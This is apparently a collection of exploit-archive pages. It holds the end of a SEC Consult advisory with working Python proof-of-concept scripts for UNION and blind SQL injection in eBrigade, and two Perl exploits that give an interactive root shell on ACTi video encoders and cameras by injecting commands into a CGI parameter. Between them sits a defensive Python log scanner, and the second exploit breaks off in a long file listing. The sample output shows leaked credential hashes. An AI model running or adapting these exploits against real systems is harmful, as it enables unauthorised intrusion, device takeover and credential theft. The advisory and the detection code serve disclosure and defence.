while($row=mysqli_fetch_array($res)){

Since e_code is of type integer, the proper sanitization method would be
intval().


POC URL: evenement_ical.php?evenement=1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--
-> Version after 'LOCATION:'


POC in Python:

import requests
import string
import re


url = input("URL without file (i.e. https://localhost/ebrigade): ")
phpsession = input("PHPSESSID: ")

cookies = {'PHPSESSID': phpsession}

payload = '+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--'

print("Testing vulnerability")
r = requests.get('{0}/evenement_ical.php?evenement=1{1}'.format(url, payload),
cookies=cookies)

matches = re.findall( r'^LOCATION:(.*)$', r.text, flags=re.MULTILINE)
print("Found version: {0}".format(matches[-1]))



b) UNION SQL Injection in evenements.php (CVE-2019-16744)

The script evenements.php uses the unsanitized parameter "cid" to query the
database. The results are written into a downloadable calendar file. By
breaking out of the string and adding a UNION statement, an attacker can extend
the output with arbitrary data. But the parameter "cid" must start with a valid
cid.

The user input is read on line 48:
$key = (isset($_GET['cid'])?$_GET['cid']:"");

On line 69 it is inserted as SQL string into the query:
$sqlp="select p.p_id, p.p_nom, p.p_prenom, p.p_code, p.p_mdp ,p.p_calendar,
p.p_section section, s.s_code,
md5(concat(p.p_id,'-',p.p_nom,'-',p.p_mdp)) keyp
from pompier p , section s
where p.p_fin is null
and p.p_section = s.s_id
and md5(concat(p.p_id,'-',p.p_nom,'-',p.p_mdp)) = '$key'

Which is executed and fetched on line 72 and 73:
$resp = mysqli_query($dbc,$sqlp);
while($rowp= mysqli_fetch_array($resp)){

Here an attacker can add arbitrary SQL code by breaking out of the string.
Since the expected value is of type string, the proper sanitization method
would be mysqli_real_escape_string().


POC URL: evenements.php?cid=<valid_cid>%27+union+select+1,2,3,4,5,6,7,version(),%279
-> Version can be found in X-WR-CALNAME


POC in Python:

import requests
import string
import re


url = input("URL without file (i.e. https://localhost/ebrigade): ")
phpsession = input("PHPSESSID: ")
valid_cid = input("Valid CID: ")

cookies = {'PHPSESSID': phpsession}

payload = '%27+union+select+1,2,3,4,5,6,7,version(),%279'

print("Testing vulnerability")
r = requests.get('{0}/evenements.php?cid={1}{2}'.format(url, valid_cid, payload), cookies=cookies)

matches = re.findall( r'^X-WR-CALNAME:(.*) - (.*)$', r.text, flags=re.MULTILINE)
print("Found version: {0}".format(matches[0][1]))


c) Blind SQL Injection in evenement_choice.php (CVE-2019-16745)

The script evenement_choice.php uses the wrongly sanitized parameter
"chxCal" as an array to query the database. The results are shown in a search
result. By breaking out, an attacker can extend the query's condition to guess
or brute arbitrary data.

The user input is read on line 108:
$ChxCalendar = (isset($_GET['btGo'])?(isset($_GET['chxCal'])?$_GET['chxCal']
:array()):$chxCal);

On line 169 it is added to the statement by joining the array elements and
wrongly sanitizing it with mysqli_real_escape_string():
$query .= "\n and S.S_ID in (".get_family("$filter").(count($ChxCalendar)>0?",
".mysqli_real_escape_string($dbc,implode(",",$ChxCalendar)):"").")";

Which is executed on line 202:
$result=mysqli_query($dbc,$query);

Here an attacker can add arbitrary SQL code - except quotations - by breaking
out of the list.
Since the expected value of each element is of type integer, the proper
sanitization method would be intval() for each array element.


POC URL: evenement_choice.php?ec_mode=default&page=1&btGo=1&chxCal[0]=5)+and+(ord(substring(version(),1,1))+%3D+49
-> Returns the search results if the version starts with 1 (ASCII value 49). MySQL substring()
positions start at 1; position 0 yields an empty string, so the condition can never hold with ",0,1".


POC in Python:

import requests
import string


url = input("URL without file (i.e. https://localhost/ebrigade): ")
phpsession = input("PHPSESSID: ")

base = '{0}/evenement_choice.php?ec_mode=default&page=1&btGo=1&chxCal[0]=5'.format(url)
true_payload = ')+and+(1%3D1'
false_payload = ')+and+(1%3D0'

cookies = {'PHPSESSID': phpsession}


def page_len(payload):
    # Length of the search result page for the given injected condition
    return len(requests.get(base + payload, cookies=cookies).text)


print("Testing vulnerability")
true_len = page_len(true_payload)
false_len = page_len(false_payload)

if true_len > false_len:
    print("Vulnerability verified.")

    # get string length
    version_len = 0
    while page_len(')+and+(length(version())+%3D+{0}'.format(version_len)) == false_len:
        version_len += 1
    print("Version string has {0} characters.".format(version_len))

    # brute version (MySQL substring() positions start at 1)
    version_string = ''
    chars = string.ascii_lowercase + string.ascii_uppercase + string.digits + '.-'
    for i in range(version_len):
        print("Bruting position {0}".format(i + 1))
        for c in chars:
            if page_len(')+and+(ord(substring(version(),{0},1))+%3D+{1}'.format(i + 1, ord(c))) > false_len:
                version_string += c
                print("Found new char of version: {0}".format(version_string))
                break
    print("Found version: {0}".format(version_string))

else:
    print("Could not verify Vulnerability.")


Vulnerable / tested versions:
-----------------------------
The following versions were tested and found to be vulnerable:
- 4.5.1
- 4.5
- 4.4
- 4.3
- 4.2
- 4.1
- 4.0


Vendor contact timeline:
------------------------
2019-06-14: Contacting vendor through https://ebrigade.net/contact/
2019-06-15: Vendor replies to send advisory via unencrypted email
2019-06-17: Sending the advisory to the vendor to the given email address
Vendor acknowledges receipt, plans to release eBrigade version 5.0
with security improvements soon
2019-07-02: Asking vendor for a status update
Vendor: the new release 5.0 will "likely be available next month"
2019-08-14: Asking for a status update; no reply
2019-08-29: Set the release date to 2019-09-26, since release of the fixed version
should be this month and no answer on news was received by the vendor
2019-09-23: Checking the vendor website, verification that a new version has already
been released which fixes the issues
2019-09-26: Public release of security advisory


Solution:
---------
The vendor provides an updated version (v5.0 or higher, v5.0.1) which should be
installed immediately:
https://sourceforge.net/projects/ebrigade/files/


Workaround:
-----------
None.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF David Haintz / @2019


ACTi ACD-2100 Video Encoder Remote Command Execution


ACTi ACD-2100 video encoder remote command execution exploit.


MD5 | 745e2070e39541fdb22cf689631b9103

#!/usr/bin/perl
#
# ACTi ACD-2100 Video Encoder Remote Command Execution Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# Firmware Version = A1D-220-V3.08.08-AC
# Production ID = ACD2100-08E-X-00498
# Factory Default Type = NTSC, Composite, Two Ways Audio (0x71)
# Company Name = ACTi Corporation
# WEB Site = www.acti.com
# Profile ID = ADV7180-RXX_V071030A
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# # [ ACTi ACD-2100 Video Encoder Remote Command Execution Exploit
# # [ ============================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Server: thttpd/2.25b 29dec2003
# # [ The target is vulnerable
# # [
# # [ Directory Traversal
# # [ http://192.168.1.1/cgi-bin/./
# # [ http://192.168.1.1/cgi-bin/../
# # [ http://192.168.1.1/cgi-bin/80503736
# # [ http://192.168.1.1/cgi-bin/cmd/
# # [ http://192.168.1.1/cgi-bin/encoder
# # [ http://192.168.1.1/cgi-bin/macdev
# # [ http://192.168.1.1/cgi-bin/mpeg4
# # [ http://192.168.1.1/cgi-bin/system
# # [ http://192.168.1.1/cgi-bin/test
# # [ http://192.168.1.1/cgi-bin/update
# # [ http://192.168.1.1/cgi-bin/updatem
# # [ http://192.168.1.1/cgi-bin/url.cgi
# # [ http://192.168.1.1/cgi-bin/videoconfiguration.cgi
# # [ http://192.168.1.1/cgi-bin/web1.cgi
# # [
# # [ Got root?
# # [ # id
# # [ execute : /sbin/iperf -c ;id &
# # [ uid=0(root) gid=0(root)
# # [ # cat /etc/passwd
# # [ execute : /sbin/iperf -c ;cat /etc/passwd &
# # [ root::0:0:root:/root:/bin/bash
# # [ bin:*:1:1:bin:/bin:
# # [ daemon:*:2:2:daemon:/usr/sbin:
# # [ sys:*:3:3:sys:/dev:
# # [ adm:*:4:4:adm:/var/adm:
# # [ lp:*:5:7:lp:/var/spool/lpd:
# # [ sync:*:6:8:sync:/bin:/bin/sync
# # [ shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
# # [ halt:*:8:10:halt:/sbin:/sbin/halt
# # [ mail:*:9:11:mail:/var/spool/mail:
# # [ news:*:10:12:news:/var/spool/news:
# # [ uucp:*:11:13:uucp:/var/spool/uucp:
# # [ operator:*:12:0:operator:/root:
# # [ games:*:13:100:games:/usr/games:
# # [ ftp:*:15:14:ftp:/var/ftp:
# # [ man:*:16:100:man:/var/cache/man:
# # [ nobody:*:65534:65534:nobody:/home:/bin/sh
# # [ # ls -la /var/log
# # [ execute : /sbin/iperf -c ;ls -la /var/log &
# # [ -rw-r--r-- 1 0 0 259 system_info_url.txt
# # [ -rw-r--r-- 1 0 0 259 system_info_web.txt
# # [ -rw-r--r-- 1 0 0 94 wan_info_brief.txt
# # [ -rw-r--r-- 1 0 0 455 systemlog.txt
# # [ drwxr-xr-x 5 0 0 1024 ..
# # [ drwxr-xr-x 2 0 0 1024 .
# # [ # cat cmd/.htpasswd
# # [ execute : /sbin/iperf -c ;cat cmd/.htpasswd &
# # [ admin:rGtBkUV3A76PC
# # [ Admin:rGtBkUV3A76PC
# # [ # find / -type f
# # [ execute : /sbin/iperf -c ;find / -type f &
# # [ #
# #

use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
$| = 1;

print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0

print "[ ACTi ACD-2100 Video Encoder Remote Command Execution Exploit
[ ============================================================
[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>
";

if(not defined $ARGV[0])
{
print "[ Usage: perl $0 [target]\n";
print "[ Example: perl $0 192.168.1.1\n\n";
exit;
}
my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0];

my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new();
$browser->timeout(10);
$browser->agent($user_agent);
my $target = $host."/cgi-bin/";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request);
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');
if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){
print "[ Server: ", $response->header('Server'), "\n";
print "[ The target is vulnerable\n";
print "[\n[ Directory Traversal\n";
my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
my @files = $tree->look_down(_tag => 'a');
print "[ ", $host.$_->attr('href'), "\n" for @files;
print "[\n[ Got root?\n";
while(1){
my $cmd;
print "[ \# ";
chomp($cmd = <STDIN>);
if($cmd eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
exit if $cmd eq 'exit';

my $target = $host."/cgi-bin/test?iperf=;".$cmd;
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ ", $_, "\n" for split(/\n/,$response->content());
}


} else {
print "[ Exploit failed! The target isn't vulnerable\n";
exit;
}
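
A defender-side check for the injection the two ACTi exploits on this page rely on (the unsanitized `iperf` parameter of `/cgi-bin/test`, which the device passes to a shell as `/sbin/iperf -c <value> &`), as an added example that is not part of the original exploit or of ACTi's firmware; the log lines, hosts and timestamps are constructed, and the parser assumes thttpd's default Common Log Format layout:

```python
"""
Flag abuse of the ACTi /cgi-bin/test 'iperf' parameter in web-server access
logs. The exploit above smuggles a shell command through the query string
(test?iperf=;<cmd>); the CGI builds "/sbin/iperf -c <value> &" and runs it
through a shell, so any shell metacharacter in the value is a red flag.
All log lines below are constructed samples, not data from a real device.
"""
import re
from urllib.parse import urlsplit, unquote

# Sequences that let a value break out of the intended iperf argument.
SHELL_META = re.compile(r'[;&|`\n\r]|\$\(')

# Common Log Format (thttpd default): host ident user [time] "request" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)


def parse_clf(line):
    """Return the CLF fields as a dict, or None if the line does not parse."""
    m = CLF.match(line)
    return m.groupdict() if m else None


def injected_command(target):
    """If `target` is a /cgi-bin/test request whose iperf parameter carries
    shell metacharacters, return the decoded parameter value, else None."""
    parts = urlsplit(target)
    if parts.path != '/cgi-bin/test':
        return None
    # Split on '&' only: ';' is part of the injected value, not a separator.
    for pair in parts.query.split('&'):
        key, _, raw = pair.partition('=')
        if key != 'iperf':
            continue
        value = unquote(raw)  # decode %3B, %20 etc. before inspecting
        if SHELL_META.search(value):
            return value
    return None


def scan_log(lines):
    """Return (host, time, decoded iperf value) for every suspicious request."""
    hits = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue
        cmd = injected_command(rec['target'])
        if cmd is not None:
            hits.append((rec['host'], rec['time'], cmd))
    return hits


SAMPLE_LOG = [
    # constructed: benign directory-listing request
    '10.0.0.5 - - [01/Jan/2019:12:00:00 +0000] "GET /cgi-bin/ HTTP/1.1" 200 1024',
    # constructed: an iperf target that looks like an ordinary host address
    '10.0.0.5 - - [01/Jan/2019:12:00:01 +0000] "GET /cgi-bin/test?iperf=10.0.0.9 HTTP/1.1" 200 64',
    # constructed: the injection shape used by the exploit above
    '10.0.0.7 - - [01/Jan/2019:12:00:02 +0000] "GET /cgi-bin/test?iperf=;id HTTP/1.1" 200 40',
    # constructed: same, with the value percent-encoded by the client
    '10.0.0.7 - - [01/Jan/2019:12:00:03 +0000] "GET /cgi-bin/test?iperf=%3Bcat%20/etc/passwd HTTP/1.1" 200 512',
    # constructed: metacharacter present, but not the /cgi-bin/test sink
    '10.0.0.8 - - [01/Jan/2019:12:00:04 +0000] "GET /cgi-bin/system?x=;id HTTP/1.1" 404 0',
]

if __name__ == '__main__':
    for host, when, cmd in scan_log(SAMPLE_LOG):
        print(f'{host} [{when}] /cgi-bin/test iperf={cmd!r}')
```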

ACTi ACM-5611 Video Camera Remote Command Execution


ACTi ACM-5611 video camera remote command execution exploit.


MD5 | 1fc8c409a8a32a076776b237cf33f617

#!/usr/bin/perl
#
# ACTi ACM-5611 Video Camera Remote Command Execution Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# Firmware Version = A1D-220-V3.08.08-AC
# Production ID = ACM5611-08G-X-00485
# Factory Default Type = NTSC, Composite, Two Ways Audio (0x71)
# Company Name = ACTi Corporation
# WEB Site = www.acti.com
# Profile ID = MT9M131-RB0_V080507A
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (data loss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Don't do anything without permissions)
#
# # [ ACTi ACM-5611 Video Camera Remote Command Execution Exploit
# # [ ============================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Server: thttpd/2.25b 29dec2003
# # [ The target is vulnerable
# # [
# # [ Directory Traversal
# # [ http://192.168.1.1/cgi-bin/./
# # [ http://192.168.1.1/cgi-bin/../
# # [ http://192.168.1.1/cgi-bin/80503736
# # [ http://192.168.1.1/cgi-bin/cmd/
# # [ http://192.168.1.1/cgi-bin/encoder
# # [ http://192.168.1.1/cgi-bin/macdev
# # [ http://192.168.1.1/cgi-bin/mpeg4
# # [ http://192.168.1.1/cgi-bin/system
# # [ http://192.168.1.1/cgi-bin/test
# # [ http://192.168.1.1/cgi-bin/update
# # [ http://192.168.1.1/cgi-bin/updatem
# # [ http://192.168.1.1/cgi-bin/url.cgi
# # [ http://192.168.1.1/cgi-bin/videoconfiguration.cgi
# # [ http://192.168.1.1/cgi-bin/web1.cgi
# # [
# # [ Got root?
# # [ # id
# # [ execute : /sbin/iperf -c ;id &
# # [ uid=0(root) gid=0(root)
# # [ # ls -la
# # [ execute : /sbin/iperf -c ;ls -la &
# # [ -rwxr-xr-x 1 0 0 211088 web1.cgi
# # [ -rwxr-xr-x 1 0 0 106124 encoder
# # [ -rwxr-xr-x 1 0 0 54084 test
# # [ -rwxr-xr-x 1 0 0 79756 mpeg4
# # [ -rwxr-xr-x 1 0 0 89604 system
# # [ -rwxr-xr-x 1 0 0 21592 macdev
# # [ -rwxr-xr-x 1 0 0 57504 updatem
# # [ -rwxr-xr-x 1 0 0 58560 update
# # [ lrwxrwxrwx 1 0 0 8 videoconfiguration.cgi -> web1.cgi
# # [ lrwxrwxrwx 1 0 0 6 url.cgi -> system
# # [ -rwxr-xr-x 1 0 0 52888 80503736
# # [ drwxr-xr-x 2 0 0 1024 cmd
# # [ drwxr-xr-x 5 0 0 1024 ..
# # [ drw-r--r-- 3 0 0 1024 .
# # [ # ls -la /var/log/
# # [ execute : /sbin/iperf -c ;ls -la /var/log/ &
# # [ -rw-r--r-- 1 0 0 259 system_info_url.txt
# # [ -rw-r--r-- 1 0 0 259 system_info_web.txt
# # [ -rw-r--r-- 1 0 0 82 wan_info_brief.txt
# # [ -rw-r--r-- 1 0 0 455 systemlog.txt
# # [ drwxr-xr-x 5 0 0 1024 ..
# # [ drwxr-xr-x 2 0 0 1024 .
# # [ # cat /etc/passwd
# # [ execute : /sbin/iperf -c ;cat /etc/passwd &
# # [ root::0:0:root:/root:/bin/bash
# # [ bin:*:1:1:bin:/bin:
# # [ daemon:*:2:2:daemon:/usr/sbin:
# # [ sys:*:3:3:sys:/dev:
# # [ adm:*:4:4:adm:/var/adm:
# # [ lp:*:5:7:lp:/var/spool/lpd:
# # [ sync:*:6:8:sync:/bin:/bin/sync
# # [ shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
# # [ halt:*:8:10:halt:/sbin:/sbin/halt
# # [ mail:*:9:11:mail:/var/spool/mail:
# # [ news:*:10:12:news:/var/spool/news:
# # [ uucp:*:11:13:uucp:/var/spool/uucp:
# # [ operator:*:12:0:operator:/root:
# # [ games:*:13:100:games:/usr/games:
# # [ ftp:*:15:14:ftp:/var/ftp:
# # [ man:*:16:100:man:/var/cache/man:
# # [ nobody:*:65534:65534:nobody:/home:/bin/sh
# # [ # cat cmd/.htpasswd
# # [ execute : /sbin/iperf -c ;cat cmd/.htpasswd &
# # [ admin:dUHDw321YSAkP
# # [ Admin:dUHDw321YSAkP
# # [ # find / -type f
# # [ execute : /sbin/iperf -c ;find / -type f &
# # [ /proc/sys/net/core/no_cong_thresh
# # [ /proc/sys/net/core/netdev_max_backlog
# # [ /proc/sys/net/core/rmem_default
# # [ /proc/sys/net/core/wmem_default
# # [ /proc/sys/net/core/rmem_max
# # [ /proc/sys/net/core/wmem_max
# # [ /proc/sys/vm/max_map_count
# # [ /proc/sys/vm/max-readahead
# # [ /proc/sys/vm/min-readahead
# # [ /proc/sys/vm/page-cluster
# # [ /proc/sys/vm/pagetable_cache
# # [ /proc/sys/vm/kswapd
# # [ /proc/sys/vm/overcommit_memory
# # [ /proc/sys/vm/bdflush
# # [ /proc/sys/kernel/overflowgid
# # [ /proc/sys/kernel/overflowuid
# # [ /proc/sys/kernel/random/uuid
# # [ /proc/sys/kernel/random/boot_id
# # [ /proc/sys/kernel/random/write_wakeup_threshold
# # [ /proc/sys/kernel/random/read_wakeup_threshold
# # [ /proc/sys/kernel/random/entropy_avail
# # [ /proc/sys/kernel/random/poolsize
# # [ /proc/sys/kernel/threads-max
# # [ /proc/sys/kernel/cad_pid
# # [ /proc/sys/kernel/sem
# # [ /proc/sys/kernel/msgmnb
# # [ /proc/sys/kernel/msgmni
# # [ /proc/sys/kernel/msgmax
# # [ /proc/sys/kernel/shmmni
# # [ /proc/sys/kernel/shmall
# # [ /proc/sys/kernel/shmmax
# # [ /proc/sys/kernel/rtsig-max
# # [ /proc/sys/kernel/rtsig-nr
# # [ /proc/sys/kernel/printk
# # [ /proc/sys/kernel/ctrl-alt-del
# # [ /proc/sys/kernel/real-root-dev
# # [ /proc/sys/kernel/cap-bound
# # [ /proc/sys/kernel/tainted
# # [ /proc/sys/kernel/core_uses_pid
# # [ /proc/sys/kernel/panic
# # [ /proc/sys/kernel/domainname
# # [ /proc/sys/kernel/hostname
# # [ /proc/sys/kernel/version
# # [ /proc/sys/kernel/osrelease
# # [ /proc/sys/kernel/ostype
# # [ /proc/sysvipc/shm
# # [ /proc/sysvipc/msg
# # [ /proc/sysvipc/sem
# # [ /proc/net/packet
# # [ /proc/net/unix
# # [ /proc/net/udp
# # [ /proc/net/tcp
# # [ /proc/net/sockstat
# # [ /proc/net/snmp
# # [ /proc/net/netstat
# # [ /proc/net/raw
# # [ /proc/net/rt_cache_stat
# # [ /proc/net/rt_cache
# # [ /proc/net/route
# # [ /proc/net/arp
# # [ /proc/net/netlink
# # [ /proc/net/pppoe
# # [ /proc/net/dev_mcast
# # [ /proc/net/softnet_stat
# # [ /proc/net/dev
# # [ /proc/kcore
# # [ /proc/ksyms
# # [ /proc/slabinfo
# # [ /proc/cpuinfo
# # [ /proc/kmsg
# # [ /proc/execdomains
# # [ /proc/iomem
# # [ /proc/swaps
# # [ /proc/locks
# # [ /proc/cmdline
# # [ /proc/ioports
# # [ /proc/filesystems
# # [ /proc/interrupts
# # [ /proc/partitions
# # [ /proc/devices
# # [ /proc/stat
# # [ /proc/modules
# # [ /proc/version
# # [ /proc/meminfo
# # [ /proc/uptime
# # [ /proc/loadavg
# # [ /proc/1/environ
# # [ /proc/1/status
# # [ /proc/1/cmdline
# # [ /proc/1/stat
# # [ /proc/1/statm
# # [ /proc/1/maps
# # [ /proc/1/mem
# # [ /proc/1/mounts
# # [ /proc/2/environ
# # [ /proc/2/status
# # [ /proc/2/cmdline
# # [ /proc/2/stat
# # [ /proc/2/statm
# # [ /proc/2/maps
# # [ /proc/2/mem
# # [ /proc/2/mounts
# # [ /proc/3/environ
# # [ /proc/3/status
# # [ /proc/3/cmdline
# # [ /proc/3/stat
# # [ /proc/3/statm
# # [ /proc/3/maps
# # [ /proc/3/mem
# # [ /proc/3/mounts
# # [ /proc/4/environ
# # [ /proc/4/status
# # [ /proc/4/cmdline
# # [ /proc/4/stat
# # [ /proc/4/statm
# # [ /proc/4/maps
# # [ /proc/4/mem
# # [ /proc/4/mounts
# # [ /proc/5/environ
# # [ /proc/5/status
# # [ /proc/5/cmdline
# # [ /proc/5/stat
# # [ /proc/5/statm
# # [ /proc/5/maps
# # [ /proc/5/mem
# # [ /proc/5/mounts
# # [ /proc/6/environ
# # [ /proc/6/status
# # [ /proc/6/cmdline
# # [ /proc/6/stat
# # [ /proc/6/statm
# # [ /proc/6/maps
# # [ /proc/6/mem
# # [ /proc/6/mounts
# # [ find: /proc/7/fd: No such file or directory
# # [ /proc/7/environ
# # [ /proc/7/status
# # [ /proc/7/cmdline
# # [ /proc/7/stat
# # [ /proc/7/statm
# # [ /proc/7/maps
# # [ /proc/7/mem
# # [ /proc/7/mounts
# # [ /proc/14/environ
# # [ /proc/14/status
# # [ /proc/14/cmdline
# # [ /proc/14/stat
# # [ /proc/14/statm
# # [ /proc/14/maps
# # [ /proc/14/mem
# # [ /proc/14/mounts
# # [ /proc/132/environ
# # [ /proc/132/status
# # [ /proc/132/cmdline
# # [ /proc/132/stat
# # [ /proc/132/statm
# # [ /proc/132/maps
# # [ /proc/132/mem
# # [ /proc/132/mounts
# # [ /proc/142/environ
# # [ /proc/142/status
# # [ /proc/142/cmdline
# # [ /proc/142/stat
# # [ /proc/142/statm
# # [ /proc/142/maps
# # [ /proc/142/mem
# # [ /proc/142/mounts
# # [ /proc/153/environ
# # [ /proc/153/status
# # [ /proc/153/cmdline
# # [ /proc/153/stat
# # [ /proc/153/statm
# # [ /proc/153/maps
# # [ /proc/153/mem
# # [ /proc/153/mounts
# # [ /proc/154/environ
# # [ /proc/154/status
# # [ /proc/154/cmdline
# # [ /proc/154/stat
# # [ /proc/154/statm
# # [ /proc/154/maps
# # [ /proc/154/mem
# # [ /proc/154/mounts
# # [ /proc/157/environ
# # [ /proc/157/status
# # [ /proc/157/cmdline
# # [ /proc/157/stat
# # [ /proc/157/statm
# # [ /proc/157/maps
# # [ /proc/157/mem
# # [ /proc/157/mounts
# # [ /proc/164/environ
# # [ /proc/164/status
# # [ /proc/164/cmdline
# # [ /proc/164/stat
# # [ /proc/164/statm
# # [ /proc/164/maps
# # [ /proc/164/mem
# # [ /proc/164/mounts
# # [ /proc/171/environ
# # [ /proc/171/status
# # [ /proc/171/cmdline
# # [ /proc/171/stat
# # [ /proc/171/statm
# # [ /proc/171/maps
# # [ /proc/171/mem
# # [ /proc/171/mounts
# # [ /proc/172/environ
# # [ /proc/172/status
# # [ /proc/172/cmdline
# # [ /proc/172/stat
# # [ /proc/172/statm
# # [ /proc/172/maps
# # [ /proc/172/mem
# # [ /proc/172/mounts
# # [ /proc/173/environ
# # [ /proc/173/status
# # [ /proc/173/cmdline
# # [ /proc/173/stat
# # [ /proc/173/statm
# # [ /proc/173/maps
# # [ /proc/173/mem
# # [ /proc/173/mounts
# # [ /proc/174/environ
# # [ /proc/174/status
# # [ /proc/174/cmdline
# # [ /proc/174/stat
# # [ /proc/174/statm
# # [ /proc/174/maps
# # [ /proc/174/mem
# # [ /proc/174/mounts
# # [ /proc/175/environ
# # [ /proc/175/status
# # [ /proc/175/cmdline
# # [ /proc/175/stat
# # [ /proc/175/statm
# # [ /proc/175/maps
# # [ /proc/175/mem
# # [ /proc/175/mounts
# # [ /proc/16706/environ
# # [ /proc/16706/status
# # [ /proc/16706/cmdline
# # [ /proc/16706/stat
# # [ /proc/16706/statm
# # [ /proc/16706/maps
# # [ /proc/16706/mem
# # [ /proc/16706/mounts
# # [ /proc/16707/environ
# # [ /proc/16707/status
# # [ /proc/16707/cmdline
# # [ /proc/16707/stat
# # [ /proc/16707/statm
# # [ /proc/16707/maps
# # [ /proc/16707/mem
# # [ /proc/16707/mounts
# # [ /proc/16708/environ
# # [ /proc/16708/status
# # [ /proc/16708/cmdline
# # [ /proc/16708/stat
# # [ /proc/16708/statm
# # [ /proc/16708/maps
# # [ /proc/16708/mem
# # [ /proc/16708/mounts
# # [ /proc/16709/environ
# # [ /proc/16709/status
# # [ /proc/16709/cmdline
# # [ /proc/16709/stat
# # [ /proc/16709/statm
# # [ /proc/16709/maps
# # [ /proc/16709/mem
# # [ /proc/16709/mounts
# # [ /proc/26139/environ
# # [ /proc/26139/status
# # [ /proc/26139/cmdline
# # [ /proc/26139/stat
# # [ /proc/26139/statm
# # [ /proc/26139/maps
# # [ /proc/26139/mem
# # [ /proc/26139/mounts
# # [ /proc/29140/environ
# # [ /proc/29140/status
# # [ /proc/29140/cmdline
# # [ /proc/29140/stat
# # [ /proc/29140/statm
# # [ /proc/29140/maps
# # [ /proc/29140/mem
# # [ /proc/29140/mounts
# # [ /proc/29176/environ
# # [ /proc/29176/status
# # [ /proc/29176/cmdline
# # [ /proc/29176/stat
# # [ /proc/29176/statm
# # [ /proc/29176/maps
# # [ /proc/29176/mem
# # [ /proc/29176/mounts
# # [ /proc/7727/environ
# # [ /proc/7727/status
# # [ /proc/7727/cmdline
# # [ /proc/7727/stat
# # [ /proc/7727/statm
# # [ /proc/7727/maps
# # [ /proc/7727/mem
# # [ /proc/7727/mounts
# # [ /proc/7728/environ
# # [ /proc/7728/status
# # [ /proc/7728/cmdline
# # [ /proc/7728/stat
# # [ /proc/7728/statm
# # [ /proc/7728/maps
# # [ /proc/7728/mem
# # [ /proc/7728/mounts
# # [ /proc/7729/environ
# # [ /proc/7729/status
# # [ /proc/7729/cmdline
# # [ /proc/7729/stat
# # [ /proc/7729/statm
# # [ /proc/7729/maps
# # [ /proc/7729/mem
# # [ /proc/7729/mounts
# # [ /proc/23419/environ
# # [ /proc/23419/status
# # [ /proc/23419/cmdline
# # [ /proc/23419/stat
# # [ /proc/23419/statm
# # [ /proc/23419/maps
# # [ /proc/23419/mem
# # [ /proc/23419/mounts
# # [ /proc/14789/environ
# # [ /proc/14789/status
# # [ /proc/14789/cmdline
# # [ /proc/14789/stat
# # [ /proc/14789/statm
# # [ /proc/14789/maps
# # [ /proc/14789/mem
# # [ /proc/14789/mounts
# # [ /proc/14790/environ
# # [ /proc/14790/status
# # [ /proc/14790/cmdline
# # [ /proc/14790/stat
